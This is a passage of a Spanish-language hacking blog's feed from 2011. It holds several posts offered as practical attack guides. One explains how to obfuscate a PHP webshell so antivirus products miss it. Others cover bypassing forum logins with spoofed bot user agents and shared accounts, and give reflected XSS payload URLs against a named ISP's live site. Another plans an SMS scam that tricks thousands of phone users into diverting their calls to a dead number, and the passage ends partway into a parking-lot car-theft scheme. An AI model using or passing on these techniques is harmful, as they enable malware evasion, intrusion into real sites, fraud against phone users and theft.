Firmas y hashes para Detectar un Code Malicioso..para ello nos bastara con probar Subir nuestra Shell a [NovirusThanks] y comprobar Su Nivel de Indetectabilidad O detectabilidad&lt;br /&gt;&lt;br /&gt;Primero Buscaremos Una Shell Si no la Tenemos.. Aca les dejo la Mia&lt;br /&gt;&lt;br /&gt;[PERDON POR PONERLA EN UNA WEB APARTE ES QUE LA SHELL ERA MUY EXTENSA EN CODIGO Y [CODE] NO LA COGIA BIEN]&lt;br /&gt;&lt;br /&gt;&lt;a href="http://paste2.org/p/647926" target="link"&gt;http://paste2.org/p/647926&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Segundo la Guardamos como Shell.php y la subimos a NovirusthanKs y seleccionamos la Opcion de "Do not distribute the sample" y Damos en SubmIT..Demoraria unos Min Y la Dependencia de Tu conexion..&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i50.tinypic.com/14tpy05.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://i50.tinypic.com/14tpy05.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Despues de Obtener el reporte Veremos Cuantos AVS la Detectan..&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i50.tinypic.com/ohqw7q.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://i50.tinypic.com/ohqw7q.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Como Podemos ver es detectado 13/21 ... Muchos :O..Bueno ahora Llegaremos al Servicion Online de OFUSCACION &lt;a href="http://www.codeeclipse.com/step1.php" target="link"&gt;CODE-ECLIPSE&lt;/a&gt; y pegamos Nuestro Code De Shell en el Recuadro y Le damos en el boton [NEXT] &lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i47.tinypic.com/qx9jix.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://i47.tinypic.com/qx9jix.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Eligen la Opcion [Nombre de shell] Buff prepare&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i47.tinypic.com/vy7fab.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://i47.tinypic.com/vy7fab.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Luego Encodeamos y damos Finish y Esperamos a Que nos Bote Nuestro Code Ofuscado!!&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i46.tinypic.com/qz2p3m.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://i46.tinypic.com/qz2p3m.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Ps ya tenemos Nuestro Code Ofuscado Y luego de copiarlo y guardar Procedemos a Subirlo al Novirusthanks Haber Que Nivel De Indetectabilidad tiene Ahora...&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i49.tinypic.com/2vaxpi1.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://i49.tinypic.com/2vaxpi1.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bn Como ya vemos Nuestra Shell Ahora es Detectada Solo Por 2 AVS.Bueno Ahora Si Queremos Indetectarla mas Lo Unico q nos Tocaes Editar el Source para Ir Burlando hashes...SE NECESITA CONOCIMIENTO DE PROGRAMADOR&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-6617452885593619470?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/6617452885593619470/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/puesto-que-la-guia-no-es-mia-yo-tratare.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/6617452885593619470'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/6617452885593619470'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/puesto-que-la-guia-no-es-mia-yo-tratare.html' title='Ofuscando [Sources] Webshell'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i50.tinypic.com/14tpy05_th.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-3274428942713002048</id><published>2011-05-29T19:41:00.001-07:00</published><updated>2011-05-29T19:47:25.402-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips'/><title type='text'>Visualizar [LINKS] ocultos en foros</title><content type='html'>Pues Este Articulo lo hago por q veo q hay users q preguntan mucho sobre esto... en el caso de Nuestro compañero &lt;font color="green"&gt;R00tMan&lt;/font&gt; Q ha Buscado info en foros y no lo dejan ver por Links Ocultos...&lt;br /&gt;&lt;br /&gt;Estas Curiosidades de ver Links Ocultos es algo &lt;font color="cyan"&gt;LECHER&lt;/font&gt; ya q Aprovecharemos un recurso de la web Sin registrarse ni dar gracias ni Aportar!! &lt;br /&gt;&lt;br /&gt;hay varios Metodos.. MurdeR Dio uno y es el de RSS.. algo Antiguo pero no lo Aporto ya q Es un Complique Buscar El RSS de una web, si esta no la tiene al publico!..&lt;br /&gt;&lt;br /&gt;Para ello Aportare Metodos SIMPLES - BASICOS - 80% FuNCIONALES&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;METODOS&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1-&lt;/b&gt; El Primero es Simple.. Es la Burla hacia el sistema de FORO.. mediante los AGENTES para hacerle creer q Somos BOTS recopilatorios... en mi caso usaremos el.. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ADDON: &lt;i&gt;User Agent SwitCher&lt;/i&gt;&lt;br /&gt;A- Voy en la red googleando y encuentro un foro con una info y PFF me vota lo SGTE:&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i40.tinypic.com/14t677n.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://ddlr.servepics.com/rd.php?go=http://i40.tinypic.com/14t677n.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Que mal :( No podre ver la Info me da WEVA registrarme :(&lt;br /&gt;&lt;br /&gt;B- Nos vamos a HERRAMIENTAS/DEFAULT USER AGENT/SEARCH BOT/&lt;br /&gt;&lt;br /&gt;Nos Salen varias Opciones..&lt;br /&gt;&lt;br /&gt;&lt;i&gt;GOOGLEBOT&lt;br /&gt;&lt;br /&gt;MSN BOT&lt;br /&gt;&lt;br /&gt;YAHOO BOT&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Intentaremos Con cada una...&lt;br /&gt;&lt;br /&gt;Pff Oprimo en el GOOGLEBOT y le doy F5 a la pagina De repente me sale la Info como si estuviera REGISTRADO y Saco la Info q Tanto Buscaba :D FACIL NO¿?&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i42.tinypic.com/68vnkg.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://ddlr.servepics.com/rd.php?go=http://i42.tinypic.com/68vnkg.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2-&lt;/b&gt; No Muchas Webs te daran paso como el caso Anterior.. para ello Hay Otro metodo&lt;br /&gt;&lt;br /&gt;Herramientas: GraseyMonkey &lt;br /&gt;&lt;br /&gt;Una Vez instalada en firefox.. procedemos a Buscar nuestro SCRIPT &lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://userscripts.org/scripts/show/23074" target="link"&gt;http://userscripts.org/scripts/show/23074&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Lo Instalamos... Q hace dicho script¿?&lt;br /&gt;Este script es una WEB con una Base Muy grande de USERS/PASSWD q te permite accesar a webs de manera rapida sin registros.. es como si un amigo te prestara su cuenta&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Modo de uso&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;A- vamos a la web q deseamos entrar&lt;br /&gt;&lt;br /&gt;Ejemplo: taringa.com&lt;br /&gt;&lt;br /&gt;Al tratar de Loguear Sale la Opcion del Script "BUSCAR UN USUARIO PARA ESTE SITIO"&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i43.tinypic.com/spuiyu.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://ddlr.servepics.com/rd.php?go=http://i43.tinypic.com/spuiyu.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Elegimos la Opcion "BUSCAR UN USUARIO PARA ESTE SITIO"&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i44.tinypic.com/35lyrnr.jpg" target="link"&gt;http://i44.tinypic.com/35lyrnr.jpg&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Como vemos el Script Nos Busco un user e ingresamos a la web sin registro Alguno :P&lt;br /&gt;&lt;br /&gt;&lt;b&gt;NOTA:&lt;/b&gt; Dicho Script Aveces no suele Funcionar Por la Simple cuestion de q en la web del script TODO EL MUNDO APORTA CUENTAS y algunas estan ERRADAS como malgunas Funkan de manera Excelente!&lt;br /&gt;&lt;br /&gt;&lt;b&gt;3-&lt;/b&gt; Otro Script Para GreasyMonkey q APorto el user "SQLERROR".. Este Script es Bueno pero No Muy Funcional ya q No es un 40% Servible de paso les muestro..&lt;br /&gt;&lt;br /&gt;CON SCRIPT PUDE VISUALIZAR EL LINK OCULTO :D&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://i40.tinypic.com/24cdx21.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://ddlr.servepics.com/rd.php?go=http://i40.tinypic.com/24cdx21.jpg" class="thumbnail_center" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;4-&lt;/b&gt; el metodo es simple.. Pones la URL en Google.. y te saldra Solo 1 resultado.. le das VER EN CACHE y Listo :P&lt;br /&gt;&lt;br /&gt;&lt;font size="+2"&gt;Bueno Este Articulo No lo Hago Para Animar a Q Sean LECHERS.. Si No q Cuando esten En Apuros y Sea Necesario No Pierdan tanto Tiempo en Un registro&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;Estos Metodos son un 80% Aprobados..  Si Alguien Aporta Mas Le hago edit Al Articulo Con El Credito del Aporte!&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-3274428942713002048?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/3274428942713002048/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/visualizar-links-ocultos-en-foros.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3274428942713002048'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3274428942713002048'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/visualizar-links-ocultos-en-foros.html' title='Visualizar [LINKS] ocultos en foros'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-4846739091034399788</id><published>2011-05-29T19:34:00.000-07:00</published><updated>2011-05-29T19:35:49.392-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Bug Report'/><title type='text'>VTR - Banda Ancha Para Todos [BUGS = Q TELEFONICA]</title><content type='html'>Pues hablando con un Compañero &lt;font color="red"&gt;DARCK&lt;/font&gt; Me mostro la web de internet banda ancha... pues q Raro q Estos Dias Andan en frente Mio proveedores con XSS ajaja Una Vuln Tan Baja -.-!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;https://wsc.vtr.net/proveedores/main.asp?mensaje=%3Ch1%3EOWNED%3C/h1%3E&lt;br /&gt;&lt;br /&gt;https://wsc.vtr.net/proveedores/main.asp?mensaje=%3Cmarquee%3E%3Ch1%3ETEST-XSS%3C/h1%3E%3C/marquee%3E&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i41.tinypic.com/rsdli9.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="400" width="500" src="http://i41.tinypic.com/rsdli9.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-4846739091034399788?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/4846739091034399788/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/vtr-banda-ancha-para-todos-bugs-q.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4846739091034399788'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4846739091034399788'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/vtr-banda-ancha-para-todos-bugs-q.html' title='VTR - Banda Ancha Para Todos [BUGS = Q TELEFONICA]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i41.tinypic.com/rsdli9_th.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-4851998882986486374</id><published>2011-05-29T18:07:00.000-07:00</published><updated>2011-05-29T19:10:54.433-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Phreaking'/><title type='text'>Un Ataque que podria dejar sin servicios de telefonia movil en toda una ciudad!!</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.reclamos.cl/files/IMG_2203.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="350" width="350" src="http://www.reclamos.cl/files/IMG_2203.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Pues En mi Rato Libre Me puse a Realizar una Investigacion en celulares Analogicos y Modernos.... Probando con Cmands Sticks y Me Acorde De algo!&lt;br /&gt;&lt;br /&gt;Se Acuerdan De los 2 Famosos Commands!!!&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;**21*numerodestinatario# [SEND]&lt;br /&gt;*##21# [SEND]&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Si no se acuerdan.. estos son DESVIOS DE LLAMADAS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;br /&gt;&lt;br /&gt;Pero Se preguntaran Porque esta Huevada Se esta Posteando? Es mas Viejo Que mis Cojones!!&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Aqui va la Respuesta...&lt;br /&gt;&lt;br /&gt;Que tal Si Coges un SPAMMER CEL y Haces Los Siguiente..&lt;br /&gt;&lt;pre class="brush :html"&gt;|--------------------------------------------------------|&lt;br /&gt;| Cel: 301-xxx-xxxx&lt;br /&gt;|      301-xxx-xxxx&lt;br /&gt;|      301-xxx-xxxx&lt;br /&gt;|      301-xxx-xxxx&lt;br /&gt;|      301-xxx-xxxx&lt;br /&gt;|   Con Mas numeros..&lt;br /&gt;|&lt;br /&gt;|Mensaje: Su Operador le informa que hay una Actualizacion&lt;br /&gt;|Para Solicitarla Oprima lo Siguiente: **21*10101010#  seguido&lt;br /&gt;| de&lt;br /&gt;|la tecla Send....&lt;br /&gt;----------------------------------------------------------&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;NOTA: &lt;/b&gt; **21*10101010#  Donde se encuentra el Numero 10101010 deberia ir un Desvio con Numero Activo pero si este esta OFF o No existe Crearia un Error De llamada o Numero Errado.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;Que Pasaria?&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Lo Intente con 5 Numeros Familiares.. y con los Cels a la mano..&lt;br /&gt;&lt;br /&gt;al Momento de llamarles, Este No Permitian llamadas entrantes..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;GRABACION: NUMERO ERRADO!&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;br /&gt;Aja y Eso que.. Como Podria Joder a Toda una Ciudad.. Que  Tonteria!&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Las Bases Con los Numeros Celulares de Ciertos Operadores.. las consigues Por hay... con el objetivo de hacer Marketing, que tal si compramos unas pero sin tal objetivo?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1 Base Tiene Aprox 2 Millones de numeros Que Al Crear un &lt;i&gt;"Spammer cel"&lt;/i&gt; con soporte de cierta cantidad, Se podria Saturar Miles y Miles de Lineas Moviles...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font size="+2"&gt;Poniendolo A Prueba!&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;1- Conecte mi cel y Transferi Los Directrios y Grupos Telefonicos a un TXT&lt;br /&gt;&lt;br /&gt;2- Cogi el Spammer de un Amigo.. y Enviamos el mensaje a 50 Numeros&lt;br /&gt;&lt;br /&gt;3- Al Intentar llamar a alguno de estos&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;GRABACION: NUMERO ERRADO!&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_jSz0ENAVTqw/TPqxV_sJewI/AAAAAAAAAsI/AJwohOh5fyI/s1600/sincelular.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="300" src="http://2.bp.blogspot.com/_jSz0ENAVTqw/TPqxV_sJewI/AAAAAAAAAsI/AJwohOh5fyI/s1600/sincelular.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Al testear un rato mas Me doy cuenta.. Que en Todos Los Modelos No sirve este!!&lt;br /&gt;Solo Algunos De ellos!!!&lt;br /&gt;&lt;br /&gt;Por eso No es un 100 % COMPROBADO! ya que no tengo Miles de Celulares XD!&lt;/i&gt;&lt;br /&gt;&lt;b&gt;Pero si un 90 % Funcional!&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="yellow"&gt;CONCLUSION:&lt;/font&gt; Un Operador Movil Podria Quebrar o Decaer Con Este Fallo En Ciertos Celulares Incluso!.. La dificil SOLUCION ya que  la manera de Arreglar Seria Enviando un MENSAJE con el Discado Que lo soluciona...&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;br /&gt;SOLUCION DEL FALLO:&lt;/font&gt; &lt;div class="px"&gt;&lt;pre width="70"&gt;##21# [SEND]&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;&lt;u&gt;Pocas Palabras...&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Este Tipo de Ataques Puede Ser fatal para los Usuarios con celulares Algo Antiguos Incluso Celulares nuevos que admiten la Reprogramacion De Sticks o KeyTicks... Esto Podria Afectar Demasiado a los Locales de Llamadas.. Que Usan Generalmente este tipo de Celulares... GENRARIA UNA GRAN DECAIDA DE $$$...&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-4851998882986486374?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/4851998882986486374/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/un-ataque-que-podria-dejar-sin.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4851998882986486374'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4851998882986486374'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/un-ataque-que-podria-dejar-sin.html' title='Un Ataque que podria dejar sin servicios de telefonia movil en toda una ciudad!!'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_jSz0ENAVTqw/TPqxV_sJewI/AAAAAAAAAsI/AJwohOh5fyI/s72-c/sincelular.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-3794951310786120610</id><published>2011-05-29T17:03:00.001-07:00</published><updated>2011-05-29T17:51:04.520-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Auditorias'/><title type='text'>Como Robar un Auto? Mejor, como tomar prestado un auto?</title><content type='html'>&lt;b&gt; De Esto....&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://farm4.static.flickr.com/3211/2646972650_b3760749dd.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="342" width="500" src="http://farm4.static.flickr.com/3211/2646972650_b3760749dd.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;A esto....&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.seriouswheels.com/pics-2008/def/2008-Ferrari-612-Scaglietti-One-to-One-Program-Front-Angle-Speed-1024x768.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="500" width="500" src="http://www.seriouswheels.com/pics-2008/def/2008-Ferrari-612-Scaglietti-One-to-One-Program-Front-Angle-Speed-1024x768.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Exagerándonos un poco Con el Auto XD!&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nota Clarísima&lt;/b&gt;: Este Articulo No esta Orientado Para Robar, mas Bien Se explica el mecanismo de obtener un Automóvil de un centro comercial debido a fallas de seguridad en Su red.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;Contenido&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1-&lt;/b&gt; Centros Comerciales y Parqueaderos&lt;br /&gt;&lt;b&gt;2-&lt;/b&gt; Sistema de Seguridad de parqueaderos organizados&lt;br /&gt;&lt;b&gt;3-&lt;/b&gt; Como trabaja un Sistema de Seguridad en parqueaderos organizados&lt;br /&gt;&lt;b&gt;4-&lt;/b&gt; Donde esta la falla&lt;br /&gt;&lt;b&gt;5-&lt;/b&gt; Como Aprovechar la Falla&lt;br /&gt;&lt;b&gt;6-&lt;/b&gt; Saliendo Desapercibidos&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;Centros Comerciales y Parqueaderos&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Bueno esta demas decir que los parqueaderos de los centros comerciales usualmente son grandisimos y categorizados como los clasicos juegos de "Astucia naval"  &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ejemplo:&lt;/b&gt; A1- A2- A3 -B1 -B2 -B3 ... etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pero Estuve Observando Que estos tratan de Organizarse cada vez mas para que el usuario no tenga que ir Caminando Todo el parqueadero En busca de su Auto.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;Sistema de Seguridad de parqueaderos Organizados&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Pero De que Manera Se organizan? teletransportacion hasta el usuario? XD.. nahh Pss Observando Note Que al ingresar al parqueadero Se te Asigna un CARNET Con Un ID DIGITADO QUe identifica al Automovil.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Este Sistema Trabaja de la Siguiente Manera...&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1-&lt;/b&gt; Al ingresar el Automovil al parqueadero 2 camaras de Distintos Angulos Toma Foto Trasera y Delantera del Auto&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2-&lt;/b&gt; El Encargado Asigna un ID No Ocupado en la Lista a dichas Imagenes.&lt;br /&gt;&lt;br /&gt;Este Id Ya lo tiene un Carnet Escrito.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img35.imageshack.us/img35/4192/carnets.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="400" src="http://img35.imageshack.us/img35/4192/carnets.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ejemplo del id:&lt;/b&gt;  P1F567890&lt;br /&gt;&lt;br /&gt;P1= piso 1&lt;br /&gt;&lt;br /&gt;F5= Carril F Columna 5&lt;br /&gt;&lt;br /&gt;67890= No se con certeza, pero Supongo que es un Distintivo&lt;br /&gt;&lt;br /&gt;&lt;b&gt;3-&lt;/b&gt; Dejas las llaves del Auto y ya esta.. ir de compras&lt;br /&gt;&lt;br /&gt;&lt;b&gt;4-&lt;/b&gt; Al Terminar todo vas y Entregas El carnet Automaticamente ellos Van y te Dan tu Auto.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;Donde esta la falla Que no la Veo?&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Se me Habia Olvidado Decirles Que Al Entrar al parqueadero Hay una Entrada y una Salida... no esta Demas decirles.. porque Es un Punto Esencial .. Si es una Estupidez Aclararlo pero Por que es Esencial?&lt;br /&gt;&lt;br /&gt;Al momento de Entrar...&lt;br /&gt;&lt;br /&gt;Tu Id es Enviado a la Salida Con las Imagenes de tu Auto&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ENTRADA = Se toman Fotos del Auto te asignan id y dejas tus llaves&lt;br /&gt;&lt;br /&gt;-------&lt;br /&gt;&lt;br /&gt;SALIDA= Recibe Mediante WLAN tu Id y las Imagenes del Auto&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Demanera que Cuando Llegues.. das El carnet con tal ID ellos Buscan dicho ID veran las imagenes de tu Auto y te Llevan El Auto junto con las Llaves...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Hasta Ahora Todo va Bien No?&lt;/b&gt;&lt;br 